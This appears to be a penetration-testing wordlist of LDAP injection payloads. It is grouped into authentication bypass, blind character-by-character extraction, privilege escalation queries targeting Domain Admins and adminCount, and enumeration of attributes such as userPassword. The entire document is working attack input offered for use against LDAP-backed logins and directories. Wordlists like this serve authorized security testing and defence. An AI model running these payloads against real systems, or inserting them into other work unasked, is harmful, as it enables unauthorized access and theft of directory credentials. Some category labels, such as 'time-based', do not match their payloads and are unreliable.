# LDAP Injection Payloads

# Basic LDAP injection
*
*(uid=*)
*(cn=*)
*(objectClass=*)

# Authentication bypass
*)(uid=*))(|(uid=*
*)(|(uid=*))
*)(cn=admin)(|(cn=*
admin)(&(uid=*))

# Filter bypass
*)(objectClass=*))(&(objectClass=*
*)(|(password=*))
*)(cn=*)(|(cn=*

# Blind LDAP injection
*)(cn=a*
*)(cn=ad*
*)(cn=adm*
*)(cn=admin*

# Boolean-based
(&(uid=admin)(password=*))
(&(uid=admin)(!(password=wrong)))
(|(uid=admin)(uid=administrator))

# Wildcard usage
uid=*
cn=*
sn=*
mail=*

# Attribute extraction
*)(objectClass=*))(%26(objectClass=*
*)(uid=*))(%26(uid=*

# Extended filter injection
*)(|(objectClass=*))
*))%00
%28%29
%26
%7C
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))

# Advanced authentication bypass
*)(&(objectClass=*))
*))%00(cn=administrator
admin*)((|userpassword=*)
admin*)((|mail=*))
*)((|(cn=*))
*)(uid=*))(&(uid=*))

# Privilege escalation attempts
*)(userAccountControl:1.2.840.113556.1.4.803:=512)
*)(adminCount=1)
*)(memberOf=CN=Domain Admins*)
*)(memberOf=*)

# Time-based blind LDAP injection
*)(cn=admin))(|(cn=*
*)(cn=a*)(|(cn=*
*)(cn=ab*)(|(cn=*
*)(cn=abc*)(|(cn=*

# Special characters and encoding
%2a
%28
%29
%26
%7c
*%00
%00*
*%20
%20*

# DN injection
cn=*,ou=*,dc=*
cn=admin,ou=*,dc=*
cn=*,ou=users,dc=*

# Multi-attribute injection
(&(uid=admin)(userPassword=*))
(&(cn=admin)(mail=*))
(&(objectClass=person)(uid=*))
(|(&(uid=admin)(userPassword=*))(uid=backup))

# Error-based injection
()
(&)
(|)
(!)
(&(uid=admin)(!(cn=*)))

# Filter chain attacks
*))(|(objectClass=*
*))(|(mail=*
*))(|(userPassword=*

# Attribute enumeration
(uid=*)
(cn=*)
(sn=*)
(mail=*)
(telephoneNumber=*)
(userPassword=*)
(description=*)

# Nested filter injection
(&(uid=admin)(&(cn=*)))
(|(&(uid=admin)(cn=*))(uid=test))
(&(objectClass=person)(|(uid=admin)(uid=root)))

# Comment injection
*);#
*);-- 
*)//

# Group enumeration
(memberOf=cn=admins*)
(memberOf=cn=users*)
(memberOf=*)

# Substring search
(cn=adm*)
(cn=*admin)
(cn=*admin*)
(uid=a*)
(mail=*@admin.com)

# Range queries
(uidNumber>=1000)
(uidNumber<=5000)
(createTimestamp>=20200101000000Z)
